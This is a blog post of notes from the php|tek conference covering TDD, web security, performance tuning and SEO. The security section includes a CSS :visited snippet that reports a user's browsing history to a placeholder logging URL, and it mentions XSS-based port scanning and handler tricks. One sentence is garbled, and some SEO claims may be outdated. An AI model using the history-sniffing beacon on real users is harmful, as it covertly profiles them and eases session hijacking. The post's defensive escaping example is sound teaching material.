Eric David Blog

Awesome === php|tek

Summary of my notes from php|tek:

Test-Driven Development:
A bunch of presenters recommended using Selenium for TDD.
TDD stats:
John Deere/Ericson: TDD increased dev time by 16% but yielded fewer defects
Microsoft: TDD increased dev time by 15% but increased quality by 200% compared to their non-TDD projects
IBM: TDD did not increase dev time due to team's prior experience in TDD and yielded 40% fewer defects


Interesting exploits revealed:
A very simple way to find out which popular sites a user has visited, to aid session hijacking, XSS or otherwise: place a list of links to common web sites inside a 1x1 iframe, give each link a unique ID, and set the CSS for each link as:
a#[linkid]:visited {
    background: url('http://yoursite.com/logusers.php?userid=[userid]&linkid=[linkid]');
}
Knowing which sites a user has been to can make CSRF attacks and session hijacking attempts far easier.

Also, apparently JavaScript has the ability to do a sequential port scan from the client-side, so through an XSS hole it is possible for a malicious user to completely bypass a firewall and access any networks that the browsing computer has access to.

In some browsers, the HTML-encoded form of a single quote (') is decoded back into a literal single quote before the JavaScript runs, so the script engine sees a real quote. This means htmlentities alone cannot completely protect against malicious JavaScript.
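As an added example (not code from the post or from the conference speakers), the script below simulates the point above: a value is encoded with an htmlentities()-style function and dropped into an inline event handler, the HTML parser decodes &#039; back to a quote before the script engine sees the attribute, and the string literal is broken. Escaping for the JavaScript-string context instead (every non-alphanumeric character as \xHH) survives the decode. The entity decoder is a simplified stand-in for the browser's, the show('...') handler is an assumed template, and O'Brien is a constructed input.

```javascript
// Added example (not from the original post): why HTML-entity encoding alone
// does not protect a value that ends up inside inline JavaScript, and the
// JavaScript-string escaping that does. Runs under Node; input is constructed.

// Encoder that mirrors what PHP's htmlentities() does to the characters that
// matter here (ENT_QUOTES behaviour: the single quote becomes &#039;).
function htmlEntities(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// What the HTML parser does to an attribute value before the script engine
// ever sees it: character references are decoded back to characters.
// (Simplified stand-in for the browser; handles the numeric and named
// references used in this example.)
function decodeAttributeValue(s) {
  return s
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => String.fromCodePoint(parseInt(d, 10)))
    .replace(/&quot;/g, '"')
    .replace(/&lt;/g, '<')
    .replace(/&gt;/g, '>')
    .replace(/&amp;/g, '&');
}

// Escaper for a JavaScript string literal: every character outside [A-Za-z0-9]
// is written as \xHH, \uHHHH or \u{H...}. The output contains no quote,
// backslash, '&', '<' or '>', so neither the HTML parser nor the script
// parser can be confused by it.
function jsStringEscape(s) {
  let out = '';
  for (const ch of s) {
    const cp = ch.codePointAt(0);
    if (/^[A-Za-z0-9]$/.test(ch)) out += ch;
    else if (cp < 0x100) out += '\\x' + cp.toString(16).padStart(2, '0');
    else if (cp < 0x10000) out += '\\u' + cp.toString(16).padStart(4, '0');
    else out += '\\u{' + cp.toString(16) + '}';
  }
  return out;
}

// Assumed server-side template:  <a onclick="show('NAME')">  with NAME taken
// from user input and passed through whichever encoder the developer chose.
function buildHandler(name, encoder) {
  return "show('" + encoder(name) + "')";
}

// What the script engine ends up with: decode the attribute as the browser
// would, pull out the literal between show(' and '), and parse it as JS.
// Returns the string value if the literal is still intact, or null if the
// decoded quote broke it (a SyntaxError here; attacker-chosen text in the
// same position would be parsed as code instead of data).
function literalSeenByScript(handlerAttr) {
  const decoded = decodeAttributeValue(handlerAttr);
  const inner = decoded.slice("show('".length, decoded.length - "')".length);
  try {
    return new Function("return '" + inner + "';")();
  } catch (e) {
    return null;
  }
}

// Constructed input: an ordinary value that happens to contain a quote.
const untrustedName = "O'Brien";

console.log(buildHandler(untrustedName, htmlEntities));                        // show('O&#039;Brien')
console.log(literalSeenByScript(buildHandler(untrustedName, htmlEntities)));   // null: browser decoded the quote, literal broken
console.log(buildHandler(untrustedName, jsStringEscape));                      // show('O\x27Brien')
console.log(literalSeenByScript(buildHandler(untrustedName, jsStringEscape))); // O'Brien: literal intact
```

Run it with node. The rule it illustrates: encode for the context the value actually lands in, innermost first (the JavaScript string literal), then outermost (the HTML attribute), or avoid inline handlers altogether and hand the data to external script through a data- attribute so only HTML encoding is needed.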

JavaScript can be attached to hidden form inputs via the onpropertychange handler (browser-specific). On a similar note, in IE actually executes the JS (yet another way to XSS).


Performance tuning:
In most cases the DB is the first thing to choke; avoid superfluous use of the DB, such as storing images, sessions or static content, whenever a non-DB alternative exists.
Page load times can be reduced by serving page elements from multiple domains, bypassing IE's two-connections-per-host limitation (part of the idea behind Akamai).
Move static content to a separate lightweight static-content web server; there is no need to spawn Apache instances that include the PHP DLL just to serve static files. Organizationally, this is easier when the directory layout keeps static-served files separate from dynamic ones.
When possible, put all web server configuration in httpd.conf and do not use .htaccess files: every .htaccess file in the directory tree walked up from the requested file is re-read and parsed on every request, whereas httpd.conf is loaded once at server start-up and its settings stay in memory.


Search Engine Optimization:
Higher rank is granted to valid XHTML.
First-page search results obviously have the highest click rate and the second page the second highest, but surprisingly the last link on the last page of results also has a high click rate. Apparently many people click the last link in the result set when the first links do not have what they are seeking.
Ajax that does not degrade gracefully will greatly lower page rank.
Using Google Sitemaps substantially increases your page rank on Google.


Random notes:
Microsoft will be releasing a PHP plug-in to use VisualStudio.net as a PHP IDE.

Apache rewrite rules are incredibly powerful. Among many other things, they power the URL-based-search and "show source" features of php.net. Upcoming Apache versions will integrate with the database and will allow SQL-based rewrite and rule definitions.